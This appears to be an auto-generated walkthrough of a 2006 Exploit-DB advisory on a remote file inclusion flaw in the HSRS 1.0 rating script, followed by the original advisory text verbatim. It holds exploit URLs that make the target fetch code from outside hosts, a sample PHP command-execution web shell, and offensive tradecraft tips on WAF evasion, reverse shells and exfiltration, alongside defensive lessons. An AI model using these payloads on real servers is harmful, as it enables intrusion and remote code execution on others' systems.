By exploitdb papers bot•November 23, 2006•
papers
HSRS 1.0 'addcode.php' Remote File Inclusion Explained
HSRS 1.0 'addcode.php' Remote File Inclusion Explained
What this paper is
This paper, published by Cold Zero in 2006, details a Remote File Inclusion (RFI) vulnerability in version 1.0 of the HIOX Star Rating System Script (HSRS). The vulnerability exists in the addcode.php file, allowing an attacker to include and execute arbitrary PHP code from a remote server.
Simple technical breakdown
The core of the vulnerability lies in how the addcode.php script handles user-supplied input for a variable named hm. This variable is used in a PHP include statement without proper sanitization. When an attacker controls the hm variable to point to a remote URL containing PHP code, the vulnerable server will download and execute that code as if it were part of the original script.
The paper highlights a specific line of code: include "$hm/auth/config.php";. This line attempts to include a configuration file. If the $hm variable is controlled by an attacker to be a URL, the server will fetch the content from that URL and attempt to execute it.
Complete code and payload walkthrough
The provided paper does not contain the full source code of HSRS 1.0, nor does it provide explicit shellcode or a detailed payload. However, it points to the vulnerable line and provides an example of how to exploit it.
Vulnerable Code Snippet:
include "$hm/auth/config.php";include "$hm/auth/config.php";: This is a PHPincludestatement.- Purpose: To include and execute the content of a specified file.
- Input: The variable
$hm. - Behavior: It attempts to include the file located at the path constructed by concatenating the value of
$hmwith/auth/config.php. - Output: If the file is successfully included, its PHP code is executed. If the file doesn't exist or cannot be accessed, PHP will issue a warning or error.
- Vulnerability: The critical issue is that
$hmis not sanitized. If$hmis a URL (e.g.,http://attacker.com/evil.txt), PHP'sincludedirective can fetch content from that URL and execute it if it's valid PHP code.
Exploit Example from Paper:
http://www.Victem.0/[PaTH]/addcode.php?hm=http://coldzero.shell?cmdhttp://www.Victem.0/[PaTH]/addcode.php: This is the URL of the vulnerable HSRS script on the target server.?hm=: This indicates the start of query parameters.http://coldzero.shell?cmd: This is the attacker-controlled value for thehmparameter.http://coldzero.shell: This is the remote URL. The target server will attempt to fetch content from this address.?cmd: This part is appended to the URL. In the context of RFI, it's often used to pass commands to a remote script that will execute them. The actual command execution would depend on the content ofhttp://coldzero.shell.
Payload Explanation (Inferred):
The paper implies that http://coldzero.shell would host a PHP script designed to execute commands. A typical payload for such a scenario would look something like this (this is an example of what the attacker might host, not code from the paper itself):
<?php
// evil.txt on attacker's server
$cmd = $_GET['cmd']; // Get command from URL parameter
system($cmd); // Execute the command
?>$cmd = $_GET['cmd'];: This line retrieves a command passed via thecmdGET parameter from the URL.system($cmd);: This PHP function executes an external program and displays the output.
Mapping of Code Fragment/Block to Practical Purpose:
include "$hm/auth/config.php";-> Vulnerable Inclusion Point: This is where the RFI occurs. By controlling$hm, an attacker can redirect theincludedirective to a remote file.?hm=http://attacker.com/payload.php?cmd=-> Attack Vector: This part of the URL is used to inject the malicious remote file path and potentially commands.http://attacker.com/payload.php-> Remote Payload Host: The attacker hosts a PHP script here that will be downloaded and executed by the victim's server.?cmd=-> Command Injection Point: Used to pass commands to the remote payload script.
Shellcode/Payload Segments:
The paper does not contain explicit shellcode bytes. The "payload" is the remote PHP script hosted by the attacker. The execution flow is:
- Victim Server: Receives the request with
?hm=http://attacker.com/payload.php?cmd=some_command. - Vulnerable Script (
addcode.php): Executesinclude "$hm/auth/config.php";. - PHP Interpreter: Resolves
$hmtohttp://attacker.com/payload.php?cmd=some_command. - Network Fetch: The victim server makes an HTTP request to
http://attacker.com/payload.php?cmd=some_command. - Attacker Server: Serves
payload.php. - Victim Server (Execution): The PHP interpreter on the victim server executes the downloaded
payload.php. - Payload Execution:
payload.phpreceivessome_commandand executes it usingsystem(). - Output: The output of
some_commandis returned to the victim server and potentially displayed in the web browser.
Practical details for offensive operations teams
- Required Access Level: Low. This is a web application vulnerability, typically exploitable via a web browser or an automated scanner. No local access or elevated privileges are needed on the target server initially.
- Lab Preconditions:
- A target web server running PHP and hosting HSRS 1.0 (or a similarly vulnerable version).
- A controlled remote server accessible via HTTP/HTTPS to host the malicious PHP payload.
- Knowledge of the target's web root and the path to
addcode.php.
- Tooling Assumptions:
- Web Browser: For manual testing and crafting URLs.
- Burp Suite / OWASP ZAP: For intercepting and modifying HTTP requests, automating payload delivery, and scanning.
- Metasploit Framework: May have modules for RFI exploitation or post-exploitation.
- Custom Scripts: Python or other scripting languages for automating the process of finding vulnerable targets or delivering payloads.
- Remote Server: A simple web server (e.g., Apache, Nginx) to host the attacker's PHP payload.
- Execution Pitfalls:
- WAF/IDS Evasion: Modern Web Application Firewalls (WAFs) and Intrusion Detection Systems (IDS) are likely to detect standard RFI patterns. Obfuscation of URLs, payloads, or using less common protocols might be necessary.
- PHP Configuration (
allow_url_fopen): The target server must haveallow_url_fopenenabled in itsphp.iniconfiguration forincludeandrequireto fetch remote files. This is often disabled for security reasons on well-configured servers. - Payload Hosting Issues: The attacker's payload server must be reliable and accessible from the target. Firewalls on the attacker's side could block incoming requests from the target.
- Path Traversal / File Existence: The vulnerable script might append a fixed path like
/auth/config.php. If the attacker's URL doesn't conform to this, the include might fail. The examplehttp://coldzero.shell?cmdsuggests the attacker might be relying on the server's ability to interpretcoldzero.shellas a file and execute it, or more likely, the?cmdpart is intended to be passed to a remote script that is hosted atcoldzero.shell. The paper's example is a bit ambiguous here. A more robust exploit would behttp://attacker.com/payload.php?cmd=...wherepayload.phpis a script on the attacker's server. - Error Reporting: If PHP error reporting is turned off on the target, the attacker might not see the results of their exploit directly.
- File Type Restrictions: Some servers might have restrictions on the types of files that can be included or executed.
- Tradecraft Considerations:
- Reconnaissance: Identify web applications and their versions. Look for common PHP applications.
- Vulnerability Scanning: Use automated tools to scan for RFI vulnerabilities.
- Manual Verification: Crafting specific URLs to test for RFI.
- Payload Development: Create a versatile PHP payload that can execute commands, download further stages, or establish a reverse shell.
- Stealth: Avoid noisy scanning patterns. Use proxy chains or VPNs if necessary.
- Post-Exploitation: Once code execution is achieved, focus on privilege escalation, lateral movement, and data exfiltration, all within the scope of the authorized operation.
Where this was used and when
- Context: This vulnerability was found in the HIOX Star Rating System Script (HSRS) version 1.0. HSRS is a free PHP script designed to be added to web pages to allow users to rate content.
- Year: Published in 2006. This indicates the vulnerability was present in the script at least by that time. Exploits of this nature were common in web applications from the mid-2000s.
- Usage: Such vulnerabilities were typically exploited by attackers to deface websites, gain unauthorized access to servers, or use compromised servers as part of botnets. The paper itself is an example of a security researcher disclosing such a flaw.
Defensive lessons for modern teams
- Input Validation and Sanitization: This is the most crucial lesson. Never trust user input. All data received from external sources (GET/POST parameters, cookies, file uploads) must be rigorously validated and sanitized before being used in file operations, database queries, or system commands.
- Secure Configuration:
- Disable
allow_url_fopenandallow_url_includeinphp.iniunless absolutely necessary and with extreme caution. These directives are a primary enabler for RFI. - Configure WAFs to detect and block common RFI patterns.
- Disable
- Least Privilege Principle: Ensure web server processes run with the minimum necessary privileges. This limits the impact if an RFI exploit is successful.
- Regular Patching and Updates: Keep all web applications, frameworks, and server software updated to the latest secure versions. Vulnerabilities like this are often patched in later releases.
- Code Auditing: Regularly audit custom and third-party code for common vulnerabilities like RFI, SQL injection, XSS, etc.
- Logging and Monitoring: Implement robust logging for web server access and PHP errors. Monitor logs for suspicious activity, such as requests to unusual URLs or attempts to include remote files.
- Secure Coding Practices: Train developers on secure coding principles. Use frameworks that enforce security best practices.
ASCII visual (if applicable)
This vulnerability is a direct interaction between a web client and a web server. An ASCII visual can illustrate the flow of data.
+-----------------+ +-----------------+ +-----------------+
| Attacker's | ----> | Attacker's | ----> | Target Web |
| Machine | | Remote Server | | Server |
| (Crafts URL) | | (Hosts Payload) | | (Vulnerable App)|
+-----------------+ +-----------------+ +-----------------+
| |
| 1. Sends malicious URL |
| e.g., http://victim.com/app/addcode.php?hm=http://attacker.com/evil.php
| |
| | 2. Receives request
| |
| | 3. Fetches remote file
| | (evil.php)
| |
| | 4. Executes remote file
| | (as PHP code)
| |
| | 5. Returns output/response
+----------------------------------------------------->Source references
- Paper URL: https://www.exploit-db.com/papers/2838
- Raw Exploit URL: https://www.exploit-db.com/raw/2838
- Software Affected: HSRS 1.0 (HIOX Star Rating System Script)
- Vulnerable File:
addcode.php - Vulnerability Type: Remote File Inclusion (RFI)
- Published Date: 2006-11-23
Original Exploit-DB Content (Verbatim)
--------------------------------------|| Viva Palestine ||-----------------------------------------
--------------------------------------|| Free Saddam Hussien ||-----------------------------------------
HSRS <= 1.0 (HIOX Star Rating System Script) (addcode.php) Remote File
Include Vulnerability
Found By : CoLd Zero [ Wasem898 ]
Source : include_once ($4AZHAR_TeAM."Securty.");
require ($SpECiALPowEr.oRg_TeAm."Securty");
A_mal Hackeing Team _ Hacking
PalesTine Arab Muslim Hacker
http://www.smileygenerator.us/smileysig2/links/918742001154432992.final.gif
######################################################
#
# HSRS 1.0 (HIOX Star Rating System Script)
#
# Class: Remote File Include Vulnerability
# Published 2006-11-23
# Remote: Yes
# Type: High
# Site: http://www.hscripts.com/scripts/php/downloads/HSRS.zip
#
# Author: Cold Zero
# Contact: c.o.1.d.0@hotmail.com
#
######################################################
About :
FREE Five Star Rating System Script that can be added in any web page with
php support.
A database based script developed using php and javascript.
This give your users a chance to rate on your articles, tutorials, photos,
images or whatever you want on a scale of 1-5 stars.
==========================
file ;
addcode.php
==========================
include "$hm/auth/config.php";
======================================================
Example:
http://www.jusmail.com/5000/HSRS/addcode.php?hm=http://www.violatorthrash.com/flyers/cold.txt?cmd
======================================================
Exploit :
Http://www.Victem.0/[PaTH]/addcode.php?hm=http://coldzero.shell?cmd
======================================================
---- GreeTz: [MoHaNdKo] [Cold ThreE] [Viper Hacker] [The Wolf KSA] [o0xxdark0o[ [OrGanza] [H@mLiT] [Snake12][Root Shell]
[Metoovit] [Fucker_net] [Rageb][CoDeR] [HuGe][Str0ke] [Dr.TaiGaR[ [JEeN HacKer] [Nazy L!unx[
****************************************************************
# *www.4azhar.com Securty Team >> www.4azhar.com *
# *SpeciaL PoweR SecuritY Team >> www.specialpower.org *
# *A_mal Hacking Team >> -vv -l -p The-Pradise *
*****************************************************************
http://www.smileygenerator.us/smileysig2/links/918742001154432992.final.gif
--------------------------------------|| Viva Palestine ||-----------------------------------------
--------------------------------------|| Free Saddam Hussien ||-----------------------------------------
# milw0rm.com [2006-11-23]